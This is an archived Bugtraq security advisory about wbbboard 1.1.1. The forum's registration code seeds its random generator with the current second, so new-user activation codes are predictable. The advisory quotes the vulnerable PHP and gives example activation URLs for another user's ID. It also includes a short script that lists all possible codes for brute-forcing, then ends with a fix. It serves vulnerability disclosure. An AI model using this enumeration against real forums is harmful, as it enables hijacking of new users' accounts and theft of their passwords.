Bugtraqmailing list archives

By Date

By Thread

wbbboard 1.1.1 registration _new_users_vulnerability_

wbbboard 1.1.1 registration _new_users_vulnerability_--------------------------------------------------wbbboard  : i cant find any contact info in credits :(            i send a message to wbbhacks.de and mywbb.de            (support forums), they didnt reply for 3            days (i think enough)Affected program         : wbbboard 1.1.1Vendor                   :http://www.woltlab.de/Vulnerability-Class      : security bugOS specific              : NoRemote                   : YesProblem-Skill            : High for users waiting for registration activatin                           None for activated usersSUMMARYwbboard is php & mysql based forum.Here some code(register.php)---------------------------$datum = date("s");mt_srand($datum);$z = mt_rand();$db_zugriff->query("INSERT INTO bb".$n."_user_table$db_zugriff->(username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)$db_zugriff->VALUES$db_zugriff->('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");---------------------------after that script mail to user () mail dom with url for activationhere some code from action.php---------------------------if($action=="activation") {        $result = activat($userid,$code);        if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");        if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");        if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");        if(!$result) {                $user_id = $userid;                eval ("\$output = \"".gettemplate("note21")."\";");                $user_password = getUserPW($userid);                session_register("user_id");                session_register("user_password");                setcookie("user_id", "$user_id", time()+(3600*24*365));                setcookie("user_password", "$user_password", time()+(3600*24*365));        }        $ride = "main.php?styleid=$styleid$session";}IMPACTYou can steal NEW user account with his passwords.EXPLOITRegister in forum you will recieve a message like this:To continue registrationhttp://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322Now You Know how many users on forum and can hijak users with userid=346(for example) HEART OF EXPLOIT----------------------| $datum = date("s");|| mt_srand($datum);  |  this code result only 30 original integer words :)| $z = mt_rand();    |  i think it is not so hard to bruteforce----------------------http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693....http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007You can get all variations with this script<?phpfor($i=0; $i<60; $i++){mt_srand($i);echo mt_rand()."<BR>";     ^^^^^^^^^ here you are :)}?> SOLUTION:   use simple rand() or realy unpredictable md5(uniqid(rand(),1))

By Date

By Thread

Current thread:

• wbbboard 1.1.1 registration _new_users_vulnerability_SeazoN (May 27)